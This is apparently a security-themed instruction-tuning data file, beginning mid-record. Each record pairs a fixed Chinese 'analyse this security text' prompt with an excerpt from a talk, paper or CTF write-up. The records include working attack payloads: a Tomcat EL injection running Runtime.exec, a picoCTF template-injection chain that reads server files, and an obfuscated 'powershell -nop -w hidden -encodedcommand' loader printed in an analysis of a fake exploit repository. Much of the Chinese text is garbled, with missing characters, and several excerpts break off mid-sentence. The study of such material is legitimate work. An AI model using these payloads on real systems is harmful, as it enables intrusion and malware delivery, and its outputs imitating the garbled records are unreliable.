假的好友訊息  假的官方郵件  假的正常網頁  www.staysecureonline.com/staying-safe-online NISRA 假防毒軟體 NISRA 假防毒軟體 NISRA NISRA NISRA NISRA NISRA NISRA ZERO-DAY漏洞 (零天漏洞)  先前未知未發現的漏洞 漏洞被 發現 漏洞被 修復 危險期 NISRA 蜜罐  具有漏洞的主機  吸引駭客的入侵  紀錄駭客的", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nTomcat中表达式动态执Java代码调试 最近在看表达式注的东漏洞根源归根结底应该是Java表达式功能强持执我们 注的Java代码这觉得有必要代码调试下因为表达式解析引擎有很多我这就 Tomcat重点了它包含了jdk下的 javax.el 就以这个demo为例idea起简单的Java Web项修改index.jsp即可这注意下搭建环 境需要修改下web.xml,在默认情况Servlet 2.4 / JSP 2.0(以上)持 EL 表达式且在 index.jsp头部需加上<%@ page isELIgnored=\"false\" %> 效果如下 ${pageContext.request.getSession().setAttribute(\"a\",pageContext.request.ge tClass().forName('java.lang.Runtime').getMethod('exec',''.getClass()).invo ke(''.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invo ke(null),'calc.exe'))} 1 <%@ page contentType=\"text/html;charset=UTF-8\" language=\"java\" %> 1 <%@ page isELIgnored=\"false\" %> 2 <html> 3 <body> 4 <h2>Hello World!</h2> 5 ${233*233} 6 7 ${pageContext.request.getSession().setAttribute(\"a\",pageContext.request.ge tClass().forName('java.lang.Runtime').getMethod('exec',''.getClass()).invo ke(''.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invo ke(null),'calc.exe'))} 8 </body> 9 </html> 10 <!DOCTYPE web-app PUBLIC 1 \"-//Sun Microsystems, Inc.//DTD Web Application 2.3//EN\" 2 \"http://java.sun.com/dtd/web-app_2_3.dtd\" > 3 4 <web-app version=\"2.4\" 5 xmlns=\"http://java.sun.com/xml/ns/j2ee\" 6 xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" 7 xsi:schemaLocation=\"http://java.sun.com/xml/ns/j2ee http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd\"> 8 9 <display-name>Archetype Created Web Application</display-name> 10 </web-app> 11 在分析之前我们先了解下JSP执原理 index.jsp在执时Tomcat会将其变成index.java,我 本机路径保存在 C:\\Users\\Administrator\\AppData\\Local\\JetBrains\\IntelliJIdea2020.1\\tomcat\\Unnamed_e l_jsp_demo\\work\\Catalina\\localhost\\el_jsp_demo_war\\org\\apache\\jsp打开后内容如下 /* 1 * Generated by the Jasper component of Apache Tomcat 2 * Version: Apache Tomcat/8.5.57 3 * Generated at: 2020-12-15 09:34:50 UTC 4 * Note: The last modified time of this file was set to 5 * the last modified time of the source file after 6 * generation to assist with modification tracking. 7 */ 8 package org.apache.jsp; 9 10 import javax.servlet.*; 11 import javax.servlet.http", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Crawling Code Creature (re/for) This was marked as Reverse challenge, but we solved it like a forensics problem. In the task we get a coredump of python process. We tried loading this into gdb, but with not much luck. The symbols didn't match and we couldn't really navigate much over what we had. As a result we decided to use classic tools like `vi, grep, regex, strings`. Going over the strings in the file we noticed a couple of things. The user was sending http requests to some application running on localhost with: ``` r1 = requests.get('http://localhost:5000/message') ``` and ``` r2 = requests.get('http://localhost:5000/key') ``` There was also `from Crypto.Cipher import AES` which would suggest that something is encrypted with AES. Finally we also found some interesting long hex-encoded strings, which were not coming from the documentation: `f0623892bc68e01d3206407fa3a84a2bf0d68d57dc3b97a31b1952a8227348a9` and `f8fa35b181005f76b9eb1f867dd85ea35d4049db6e24cc92b15bbc2abed1d7b0afc8238afd7a2f7384e4becff92ce9fc` First one is 32 bytes long, so could be AES key, the other one could then be a ciphertext. ```python from Crypto.Cipher import AES def main(): key = 'f0623892bc68e01d3206407fa3a84a2bf0d68d57dc3b97a31b1952a8227348a9'.decode(\"hex\") msg = 'f8fa35b181005f76b9eb1f867dd85ea35d4049db6e24cc92b15bbc2abed1d7b0afc8238afd7a2f7384e4becff92ce9fc'.decode(\"hex\") encrypt = AES.new(key, AES.MODE_ECB, '\\0' * 16) decrypted = encrypt.decrypt(msg) print(decrypted) main() ``` Which gives us `midnight{c4n_you_r3v1ve_4_d34d_snek}`", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nIndex Veritas Project Computer Security Trends Military Intelligence American Minds Submit HQ Contact Us Understanding the Security Trends Interface So how does this thing work? Basically the premise of this study is to track increases in \"chatter\" (based on keywords) just like what ECHELON, INTERPOL, or the other intelligence gathering organizations does out there. This is based on information gathered through forums, websites, blogs, and data from various contributors. This how-to presents a quick overview of how this whole thing works. Let's start off with a simple data mining exercise. For this one, let us search for increases in chatter on the keyword \"DEFCON\". This is done by entering DEFCON in the \"chatter\" field and putting the mode as \"manual\". I'll explain later the difference between \"manual\" and \"computer-assisted\" later as well as the \"level\" field. Press \"Go\" and you will get this: Note that the increases in DEFCON chatter expectedly corresponds around the time for call for papers and the conference itself. Next let's try overlaying it with something we know that is related to DEFCON, the keyword \"PAPERS\". Using the same instructions, we add the word \"PAPERS\" in the chatter field separated by a space. Here's what we get: The Veritas Project - Threat Intelligence http://www.zerodays.org/veritas/howto-template.php 1 of 9 4/25/2009 8:06 PM Note that increases in chatter on the keyword \"PAPERS\" happen before and after the CFP and before and after the conference itself. Notice how closely the the increases in chatter follows. You'll notice a strange increase in \"PAPER\" chatter around the end of the year. Could this be still related to DEFCON? Possibly, but let's look more closely. The next demo will show you the \"computer-assisted\" mode. The computer-assisted mode let's the computer or more specifically, the AI algorithms to determine which keywords are related to the topic we are researching. Remember, in our first search, we manually determined that there", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nModule 1 A journey from high level languages, through assembly, to the running process https://github.com/hasherezade/malware_training_vol1 Creating shellcodes Shellcode: advantages  Self-sufficient: easy to inject into other applications  Small: can fit into a tiny space i.e. section caves  May be used as a loader: first code injected into an application, that follows to load other modules  Sometimes (but less often) the full malicious functionality can be implemented as shellcode (i.e. Fobber malware)  This type of code was popular in the past, virus era: where malware code was added to existing PE files (rather than injected into processes) Creating shellcode  In case of PE format we just write a code and dont have to worry how it is loaded: Windows Loader will do it  It is different when we write shellcode  We cannot rely on the conviniences provided by PE format and Windows Loader:  No sections  No Data Directories (imports, relocations)  Only code to provide everything we need... Creating shellcode Feature PE file shellcode Loading  via Windows Loader  running new EXE triggers creation of a new process  Custom, simplified  must parasite on existing process (i.e. via code injection + thread injection) Composition Sections with specific access rights, carrying various elements (code, data, resources, etc) Usually all in one memory area (read,write,execute) Relocation to the load base Defined by relocation table, applied by Windows Loader Custom; position-independent code Access to system API (Imports loading) Defined by import table, applied by Windows Loader Custom: retrieving imports via PEB lookup; no IAT, or simplified Position-independent code  In order to create a position-independent code, we must take care that all the addresses that we use are relative to the current instruction pointer address  A short jump, long jump, call to a local funcion are relative -> we can use them!  Any address that needs to be relocated (i.e. using of the data from different", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n如何去挖掘物联网环境中的高级恶意软件威胁 叶根深 360网络安全研究院研究员 $ whoami Emailyegenshen@360.cn Twitter/WeChat@zom3y3 Network Security Researcher @360Netlab TO BE A MALWARE HUNTER! #Botnet #Pentest #Honeypot #Sandbox PART 01 背景介绍 目录 CONTENTS PART 02 IoT安全现状 PART 03 挖掘未知的IoT Exploit PART 04 挖掘未知的IoT Botnet 01 03 04 02 PART 05 总结 05 PART 01 背景介绍 What is an advanced malware threat ? 0-day Exploit or Cyberweapon 概览 通过Anglerfish蜜罐我捕获到大量网络扫描Payload和IoT Botnet并和同事一起公开披露了部分报告其中包括Mirai http81DDGHajimeTheMoonIoT_reaperSatoriMuhstikHNSFbotMikroTikGhostDNSNgioweb GodluaGwmndy等 我还挖掘到一些有意思的样本部分贴在了推特上#unknown_botnet还有一个是针对IoT平台的特马但没有公开披露 此外我还捕获到3个0day其中包括被Satori Botnet利用的CVE-2017-17215漏洞被TheMoon Botnet利用的Gpon Home Routers RCE漏洞被Fbot利用的雄迈DVRIP协议漏洞 我是如何研究IoT安全的  开发Anglerfish蜜罐模拟IoT设备指纹/漏洞捕获网络扫描Payload和样本  筛选x86 ARMMIPS等CPU架构样本分析未被杀软件识别的恶意软件  开发特定漏洞扫描程序统计全网受影响设备数量等  从设备官网下载相应固件统计受影响的设备型号等 Network Scan Payload Analysis 40% IoT Firmware Reversing 10% IoT Vulnerability Scan 10% ELF Malware Analysis 40% PART 02 IoT安全现状 IoT 安全现状 IoT 安全防御能力不足 IoT Botnet 攻击能力不断升级 IoT 设备已经成为APT攻击目标 01 02 03 Vulnerability漏洞补丁能不能打上 Exploits恶意流量能不能拦截 Malware恶意程序能不能阻止运行 IoT 安全防御能力不足 IoT Botnet感染能力不断升级 Mirai内置大量弱口令 通过暴力破解Telnet服 务传播 Mirai变种集成Zyxel tr069协议漏洞传播但 因为Exploit不稳定导致 路由器重启从而引发 德国电信大断网事件 Reaper集成9个IoT漏 洞其中Varcon NVR 个 RCE漏洞在公开后2 天就被集成 Satori利用Huawei Router HG532 0-day 漏洞传播12月5号当天 统计到感染IP数量在57 万全球ISP联合行动 封锁TCP/37215端口 2016年8月1日 2016年11月28日 2017年9月13日 2017年12月5日 1 2 3 4 2018年9月4日 5 2019年2月16日 6 MikroTik设备受泄露的 CIA ChimayRed黑客工 具影响路由器被攻击 者监听网络流量充当 代理节点植入js挖矿 代码 Fbot使用XiongMai 硬编码账号密码和 DVRIP升级接口0- day漏洞传播 IoT Botnet感染能力不断升级 暴力破解 漏洞集成 漏洞挖掘  暴力破解Telnet服务  MiraiGafgyt  集成大量已公开漏洞  IoT_ReaperMirai  0-day 漏洞利用  SatoriTheMoonFbot IoT Botnet C2技术不断升级 冗余机制 通信协议 复杂化  硬编码多个C2地址  使用DGA技术  MiraiGodlua  使用P2P协议通信  使用DOH解析DNS请求  HajimeGodluaHNS  C2功能插件化  构造多级C2协议  VPNFilterNgioweb IoT 设备已经成为APT攻击目标 情报监控 窃听风云: 你的MikroTik路由器正在被监听 IP Count 37.1.207.114 5164 185.69.155.23 1347 188.127.251.61 1155 MikroTik设备受泄露的 CIA ChimayRed黑客工具影响路由器被攻击者监听网络流量充当代理节点植入js挖矿", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\ngithub上的rkxxz/CVE-2022-26809钓鱼攻 击分析 看到群有分享CVE-2022-26809 https://github.com/rkxxz/CVE-2022-26809的exp并且 readme.md还写的有模有样的 前天不是有师傅分析了不能RCE吗怎么这就出来exp了还msf上线 事出反常必有妖 赶紧下载进制来分析把 # Loader分析 下载样本发现是个 .net的程序 dnspy加载起来看下外围的程序仅仅是个loader在内部解密了个模块然后  executingAssembly.LoadModule 加载起来 动态调试下把的模块dump出来接下来开始分析模块 # 模块分析 模块内部主要有三个函数但是这个模块没有点不能当做exe直接执所以我找了 个 .net 的laoder来加载这个模块 模块加载器的是 : https://github.com/hexfati/SharpDllLoader CVE-2022-26809.exe: PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows 1 但是这需要些修改对 .net 程序不熟悉这常感谢 @404师傅的指导这个加载器要 修改下才能使 要不然没办法获取函数另外向模块函数传参的地也需要修改下不再细说了 接下看下模块的代码此模块运时先探测了下提供的ip和port能否联通 接下来这判断个件是否存在 跟进去可以看到判断的是shellcode.bin把这个件放在对应的录然后继续跟踪 发现到这判断 cmd.exe是否存在 cmd执命令 看到是调了段powershell脚本脚本copy出来 \"/c \\\"powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGU AYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAH QAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEAQQBLAFYAVwArADIALwBpA FMAQgBMACsAZQBmAGcAcgB2AEYARwBrAEQAVQBxAEMAdwBSAEIAQwBNAGwAcABwADIAZwBh AEQAQwBXACsARABlAFUAVABSAHkAWQArADIAYQBXAGcALwA0AG0ANQBqAG4ATgBuADUAMwA 2ADgATQBoAEYAdABtADcAdgBhAGsATwB5AFQATAA3AHEATABxAHEALwBxAHEAcQA3AHQASw B4AC8AeABlADUAegBHAHgAZQBUADkAMABzAEgAQgB2ADQASgBpAFIATQBCAEMAawBRAHUAR wA2AEcAVwBwAGMAKwBFAFAANAA5AG4AdgBoADIAbQBRAE0AKwB4AGIATgA4AHUAVgBWADQA VQB2AEMAUwBPAEEASgBlAHMAWQA0ADkAcgA5AGUATABrAHUAVABKAE8ARABFAHgAeQBVAHQ ANABEAGcATwBJAHgAMwBIAE8AMgBKAGoAQgBtAHEAQgA2AFcATQBXAG0AVABZAFcAUwBMAE QAQgBOAGgAZQArAEYANwA1ADgAaQBSAEsATABFAGwAdQB3AEsAYgBnAFEAMwBDAFMAdwBEA DkASQB2AHIAeQBvADEAUABmAFkAbQBuAFAANwBHAFEAZQBJAEwAaQBOAEwAUQBOAGoAbQBF AE4AOAAwAGkATABIAHcAWABsAE4ARAAzAFMAUgA1AGkAZQBWADgAcABsADgAdAAzAHcAZwB RAHoAYwBJAGMAUABFAGcAawBrAHcAbwAvAC8AaABOAFgASABmAGgAaABuAG8AegBqAGsARQ BFAGgATwArAEwAdgBRADIAbQBNADcANABYAGkAQwBUAFcAYwBlAEUAMwA1AEUAcQBmADAAT gB4AGgAUgBvAEMAcwA5AEMAUQBnAEsAZwBJAG0AaQBCAFMANABKAFAATQAvAFgAMABPAHgA awAzAEsAZABYADgASwBJAHoANQB6AGQAVQBXAHgAdwBHAG0AVgBhAG4AawBVAEgAcAB", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# T1583-002-购买基础设施-DNS服务 ## 来自ATT&CK的描述 攻击者可能会建立他们自己的域名系统DNS服务器可以在攻击目标期间使用在破坏后的活动中攻击者可以利用DNS流量进行各种任务包括指挥和控制例如应用层协议与其劫持现有的DNS服务器攻击者可能会选择配置和使用自己的DNS服务器来支持渗透行动 通过使用自己的DNS服务器攻击者可以更好的控制和管理他们的服务器端的DNS C2流量通过对DNS服务器的控制攻击者可以配置DNS应用程序为恶意软件提供有条件的响应一般来说在基于DNS的C2通道在结构上有更大的灵活性 ## 测试案例 ### DNS Tunneling DNS Tunneling是隐蔽通道的一种通过将其他协议封装在DNS协议中传输因为在互联网中DNS是一个必不可少的服务所以大部分防火墙和入侵检测设备很少会对DNS流量进行过滤由此DNS作为隐蔽信道有天生优势 #### 原理 DNS Tunneling可以分为直连和中继两种 直连client直接和指定的目标DNS Server(Authoritative NS Server)连接通过将数据编码封装在DNS协议中进行通信这种方式速度快但是隐蔽性较弱容易被探测到且存在的限制比较多很多场景不允许自己指定DNS Server 中继通过迭代DNS查询可以实现中继通道更为隐蔽但同时因为数据包到达目标DNS Server前需要经过多个节点所以速度上较慢但是可以突破防火墙等的限制 ### DNS隧道工具 使用DNS over HTTPSDoH构建弹性C2基础架构<https://xz.aliyun.com/t/3068> ## 检测日志 无法有效监测 ## 测试复现 无 ## 测试留痕 无 ## 检测规则/思路 无 ## 建议 ### 缓解措施 这种技术不容易用预防控制来缓解因为它是基于企业防御和控制范围之外的行为 ### 检测 这种活动大多发生在防御团队组织的能见度之外使得对这种行为的检测变得困难检测工作可能集中在攻击生命周期的相关阶段如在指挥和控制期间 ## 参考推荐 MITRE-ATT&CK-T1583-002 <https://attack.mitre.org/techniques/T1583/002/> 使用DNS over HTTPSDoH构建弹性C2基础架构 <https://xz.aliyun.com/t/3068>", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHacking the Apple TV and Where your Forensic Data Lives Presentation for: Defcon 17 July 30, 2009 Kevin Estis and Randy r3d Robbins DMCA Disclaimer 1. Digital Millennium Copyright Act 2. The authors of this presentation respects the intellectual property rights of others and is committed to complying with U.S. Copyright laws. Our policy is to respond to notices of alleged infringement that comply with the Digital Millennium Copyright Act. The Digital Millennium Copyright Act of 1998 (\"DMCA\") provides recourse for owners of copyrighted material who believe their rights under U.S. copyright law have been infringed on the Internet. 3. If you believe representations of your work has been copied or otherwise runs afoul of DMCA during this presentation that may constitute copyright infringement, please provide notice to our Designated Agent. The notice must include the following information as provided by the Digital Millennium Copyright Act, 17 U.S.C. 512 ( c ) (3): 4. A physical or electronic signature of a person authorized to act on behalf of the owner of an exclusive right that is allegedly infringed; 5. Identification of the copyrighted work claimed to have been infringed, or, if multiple copyrighted works at a single online site are covered by a single notification, a representative list of such works at that site; 6. Identification of the material that is claimed to be infringing or to be the subject of infringing activity and that is to be removed or access to which is to be disabled, and information reasonably sufficient to permit the service provider to locate the material; 7. Information reasonably sufficient to permit the service provider to contact the complaining party, such as address, telephone number, and, if available, an electronic mail address at which the complaining party may be contacted; 8. A statement that the complaining party has a good faith belief that use of the material in the manner complained of is not authorized by the copyright owner, i", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\npackage org.pwntester.action; import com.opensymphony.xwork2.ActionSupport; public class IndexAction extends ActionSupport { private String id; public String changeId(){ return SUCCESS; } public String getId() { return id; } public void setId(String id) { this.id = id; } }", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHacking the EULA: Reverse Benchmarking Web Application Security Scanners Each year thousands of work hours are lost by security practitioners sorting through web application security reports separating out erroneous vulnerability data. Individuals must currently work through this process in a vacuum, as there is little to no publicly available information that is helpful. Compounding this situation, restrictive vendor EULAs (End User License Agreements) prohibit publishing of research about the quality of their signature base. Due to these agreements, a chilling effect has discouraged public research into the common types of false positives that existing commercial web application scanner technologies are prone to exhibit. Overview Tom Stracener, Sr. Security Analyst, Cenzic Inc. Marce Luck, Information Security Architect, Fortune 100 company About the speakers Introduction Web Application Security Scanning Technology The Problem of False Positives What is Reverse Benchmarking? Reverse Benchmarking Methodology 10 Common False Positive Types Further Research Business as usual B) You shall not: (i) use the Software or any portion thereof except as provided in this Agreement; (ii) modify, create derivative works of, translate, reverse engineer, decompile, disassemble (except to the extent applicable laws specifically prohibit such restriction) or attempt to derive the Source Code of the Software provided to You in machine executable object code form; (iii) market, distribute or otherwise transfer copies of the Software to others; (iv) rent, lease or loan the Software; (v) distribute externally or to any third party any communication that compares the features, functions or performance characteristics of the Software with any other product of You or any third party; or (vi) attempt to modify or tamper with the normal function of a license manager that regulates usage of the Software. What is Reverse Benchmarking? Proactive Security Whoever is first in the field and awai", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nGhost Telephonist Impersonates You Through LTE CSFB Yuwei ZHENG, Lin HUANG Qing YANG, Haoqi SHAN, Jun LI UnicornTeam, 360 Technology July 30, 017 Who We Are  360 Technology is a leading Internet security company in China. Our core products are anti-virus security software for PC and cellphones.  UnicornTeam (https://unicorn.360.com/) was built in 2014. This is a group that focuses on the security issues in many kinds of wireless telecommunication systems.  Highlighted works of UnicornTeam include:  Low-cost GPS spoofing research (DEFCON 23)  LTE redirection attack (DEFCON 24)  Attack on power line communication (BlackHat USA 2016) Voice Solutions in LTE Network  VoLTE  Voice over LTE, based on IP Multimedia Subsystem (IMS)  Final target of network evolution  CSFB  Circuit Switched Fallback: switch from 4G to 3G or 2G when taking voice call  SV-LTE  Simultaneous Voice and LTE  Higher price and rapid power consumption on terminal Occasional Discovery  When we used OsmocomBB as cellphone to access GSM network, we met a difficultyDuring debugging the problem, we occasionally found a fake paging response can build the connection to network Normal 2G Call vs. CSFB When we analyze the signaling flow of CSFB, we were surprised to find that there is no authentication step. In normal 2G call, AKA does exist for every call. Vulnerability in CSFB UE eNB MME BSC MSC Paging Request Paging Paging Extended Service Requet Service Requet RRC Connection Release Paging Response Setup Call Confirmed Alerting Connect Connect Acknowledge NO Authentication Vulnerability in CSFB  The principle is like someone comes out from the door of LTE, then enters the door of GSM. He shouts I must be as quick as possible! Then he is permitted to enter, without the badge of GSM. How can we exploit it?  Basic idea  Because CSFB hasnt authentication procedure, attackers can send Paging Response on 2G network, impersonating the victim, then hijack the call link. Experiment Environment C118 OsmocomBB L1 Osmo", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nTHE UNBELIEVABLE INSECURITY OF THE BIG DATA STACK AN OFFENSIVE APPROACH TO ANALYZING HUGE AND COMPLEX INFRASTRUCTURES SHEILA A. BERTA (@UnaPibaGeek) WHO AM I? Head of Security Research at Dreamlab Technologies (Swiss Infosec Company) SHEILA A. BERTA (@UnaPibaGeek)  Offensive Security Researcher - I like to break everything :)  Developer in ASM (Microcontrollers / x86/x64), C/C++, Python and Go  RE, Hardware Hacking & Exploit Development  DCA, CKA, CKAD (Cloud Native Specialist)  Speaker at BH USA Briefings (x4), DEF CON (x4), HITB, SCSD & more LAYERS OF THE BIG DATA STACK Data Storage Data Ingestion Data Processing Data Access Cluster Management 1 2 3 4 5 LAYERS OF THE BIG DATA STACK Data Storage Data Ingestion Data Processing Data Access Cluster Management 1 2 3 4 5 EMR BIG DATA ARCHITECTURES FRONT-END GO REST API PRESTO COORDINATOR PRESTO WORKERS YARN HDFS THE ANALYSIS METHODOLOGY CLUSTER MANAGEMENT DATA STORAGE DATA PROCESSING DATA ACCESS Analysis of the management layers components. E.g.: Zookeeper, Ambari, etc. Analysis of the data ingestions components. E.g.: Flume, Kafka, Kinesis, Sqoop, etc. Analysis of the data storages components. E.g.: HDFS and HDFS-based storage, S3, etc. Analysis of the data processings components. E.g.: Spark, Storm, Flink, etc. Analysis of the data access components. E.g.: Impala, Presto, Druid, etc. DATA INGESTION MANAGEMENT LAYER 01 UNVEILING THE INSECURITY OF ZOOKEEPER AND AMBARI: ATTACKING THE CLUSTERS HEART ZOOKEEPER ARCHITECTURE AND PORTS NODE 1 NODE 2 NODE 3 NODE N ZOOKEEPER SERVICE ZOOKEEPER CLIENT ATTACKING ZOOKEEPER https://zookeeper.apache.org/releases.html#download ./zkCli.sh -server <node_ip>:2181 ATTACKING ZOOKEEPER BROWSE ZNODES CREATE ZNODES EDIT ZNODES DELETE ZNODES ls and get commands create ./znode_path new_config_data set ./znode_path config_data_edit delete ./znode_path THE SECOND DOOR OF AMBARI THE SECOND DOOR OF AMBARI 03 01 02 STORAGE LAYER 02 INSECURITY IN THE DATA STORAGE LAYER: ABUSING HADOOP RPC/IPC HADOOP ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSCOTT MOULTONS SPEECH RESEARCH MATERIAL AND NOTES ON DATA RECOVERY www.ForensicStrategy.com|www.MyHardDriveDied.com Copyright  June 2007 by Scott A. Moulton @ Forensic Strategy Services, LLC. All rights reserved. Data Recovery Whitepaper  Rev 17 Page 1 of 22 Data recovery is necessary when source material fails and where no good backup exists, either Physical or Logical. There are two types of data recovery in the standard basic sense. One type of data recovery is when there is damage to the media and the pre-existing data need to be retrieved. This will usually require the media to be repaired. The second form of data recovery is when files were purposely or accidently deleted. When this type of data recovery is necessary there is usually no damage to the media and standard software can be used to recover the data. This is the process that most software performs. Very few software programs understand damaged media. Because most software relies on calls and functions from the operating system for its input, it has no control itself over error correction or any functions that the operating system performs on the drive. I believe there a four phases to any data recovery. Four Phases of Recovery 1. Repair the Hard Drive so it is running in some form, usually requiring hardware or special equipment. 2. Image, Copy or recover the physical drive and sectors primarily by bitstream imaging. If the drive is functioning, it is possible to do this with software, however there are some hardware solutions that work very well; i.e. DeepSpar Disk Imager. This is a situation where some software is better than others, such as dd_rescue (use with dd_rhelp script) on a Linux system has a special feature that allow it to image backward (understanding why you need to image backwards is very important in data recovery). 3. Perform Logical Recovery of files, partition structures, or necessary items; usually this is by software and is the most common type of application sold. 4. Repair of ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n## 嗅探欺骗模块 |sniffing&spoofing|||||| |:-:|:-:|:-:|:-:|:-:|:-:| |[Burp Suite](Burp%20Suite.md)|[DNSChef](DNSChef.md)|[fiked](Fiked.md)|[hamster-sidejack](hamster-sidejack.md)|[Hexlnject](HexInject.md)|iaxflood| |iSMTP|isr-evilgrade|mitmproxy|ohrwurm|protos-sip|rebind| |responder|rtpbreak|rtpinsertsound|rtpmixsound|sctpscan|SIPArmyKnife| |SIPp|SIPVicious|Sniffjoke|SSLplit|sslstrip|THC-IPV6| |VoIPHopper|WebScarab|Wifi Honey|Wireshark|xspy|| |Yersinia|zaproxy|||||", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Empire3 Web Exploitation, 500 points ## Description: > Agent 513! One of your dastardly colleagues is laughing very sinisterly! Can you access his todo list and discover his nefarious plans? ## Solution: This is the follow-up for [Empire2](Empire2.md). We'll use the same solution that worked for the previous challenge: ```console root@kali:/media/sf_CTFs/pico/Empire3# python shell.py Logged in (Cmd) send 4*4 Sending: '{{4*4}}' 16 (Cmd) send ''.__class__.mro()[1].__subclasses__()[157]()._module.__builtins__['open'](''.__class__.mro()[1].__subclasses__()[157]()._module.__builtins__.__import__('os').path.join('app', '__init__.py')).read () Sending: '{{''.__class__.mro()[1].__subclasses__()[157]()._module.__builtins__['open'](''.__class__.mro()[1].__subclasses__()[157]()._module.__builtins__.__import__('os').path.join('app', '__init__.py')).read()}}' from flask import Flask from app.config import Config from flask_sqlalchemy import SQLAlchemy from flask_login import LoginManager from flask_bootstrap import Bootstrap import time,atexit from apscheduler.schedulers.background import BackgroundScheduler app = Flask(__name__) app.config.from_object(Config) db = SQLAlchemy(app) login = LoginManager(app) login.login_view = 'login' bootstrap=Bootstrap(app) from app import routes,models def DB_init(db): db.drop_all() db.create_all() u = models.User(username='jarrett.booz',password_hash='deadbeef',id=1,admin=0,secret='Likes Oreos.', name=\"Jarrett Booz\") db.session.add(u) u = models.User(username='danny.tunitis',password_hash='deadbeef',id=2,admin=0,secret='Know it all.', name= \"Danny Tunitis\") db.session.add(u) c = models.Todo(item='Shrink the moon', user_id=1) db.session.add(c) c = models.Todo(item='Grab the moon', user_id=1) db.session.add(c) c = models.Todo(item='Sit on the toilet', user_id=1) db.session.add(c) c = models.Todo(item='Make 2000 more Pico problems', user_id=2) db.session.add(c) c = models.Todo(item='Do dastardly plan: picoCTF{cookies_are_a_sometimes_food_8038d4", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHacking Humanity: Human Augmentation And You quaddi & r3plicant Rio Hotel & Casino July 2012 Who We Are. Who We Are Not.  Doctors  Your Doctors WARNINGS  This talk does not constitute medical advice.  Technologies & research described are purely experimental and dangerous.  DO NOT ATTEMPT ANY MODIFICATIONS IN THIS TALK.  ALWAYS CONSULT YOUR DOCTOR FOR ANY HEALTH CARE RELATED ISSUES.  There are a few graphic graphic medical images in this presentation. Objectives  Take a quick trip through the history of human augmentation.  Briefly get up to date on current medical stance/ethics of human augmentation.  Become familiar with the current technologies, physiology, and feasibility of various augments.  Highlight barriers to, and risks of augmentation.  If we have time Human Augmentation Design & Build Complex Mods Integrate into the Human body Hope No One Dies The problem. Traditional Medical Paradigm Treatment Disease Symptom Symptom Symptom Health Health Treat disease to replace loss of function, and/or alleviate suffering. The Enhancement Paradigm Use medical technology to improve the human condition Definitions  Enhancement  Augmentation  Cyborg  Transhumanism History The first cyborg circa 75 million BC History Real History 1500s Basic prosthe1cs 1924 EEG 1927 First therapeu1c use of amphetamine 1940 first hip implant surgery 1952 Cage-ball ar1ficial heart valve. 1958 first implantable cardiac pacemaker 1976 First neural implants 1982 Ar1ficial heart 1984 Cochlear implant FDA approval 1990s Microprocessor controlled robo1c knee 1990 first gene therapy SCID 1991 first synthe1c 3D nano structure 1994 L ventricular assist device. 1997 first neural implants to treat disease 1999 First DNA nano machine 2004 total ar1ficial heart FDA approved 2006 DNA Vaccine success 2007  2010 Gene therapy success 2008 Bladerunner of South Africa restricted from Olympics 2008 neural control by human brain. Why Augment? Step 1 Pick your mod Mechanical/Biomechanical Chemical Synaptic Transmission ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nEvolving Exploits through Genetic Algorithms By soen Who am I v CTF Player v Programmer v Virus / Worm Aficionado v Computer Scientist v Penetration Tester in daylight Domain Constraints v What we will cover v SQL injection (MySQL, SQL, MSSQL, Oracle) v Command injection (Bash, CMD, PHP, Python) v Attack surface is HTTP / HTTPS POST and GET parameters v What we will not cover v Everything else Exploiting Web Applications v Attack problems v Driven by customer v Small scope v Limited time v Report driven v Attack methodology Exploiting Web Applications v Attack problems v Attack methodology v Run as many scanning tools as possible v Manually poke at suspicious areas until a vulnerability is found v Write an exploit Exploiting Web Applications v Attack problems v Attack methodology v Problems with this v Manual code coverage is inherently small v Manual inspection of suspicious areas is time-costly v Manual exploit development takes time Existing tools for exploit discovery / development v Nessus / nmap / blind elephant / other scanning tools dont really count unless there is a signature developed for a specific vulnerability / finding. v Acunetix v Burp v ZAP v sqlmap Foundational problems with current scanning techniques v Systemic 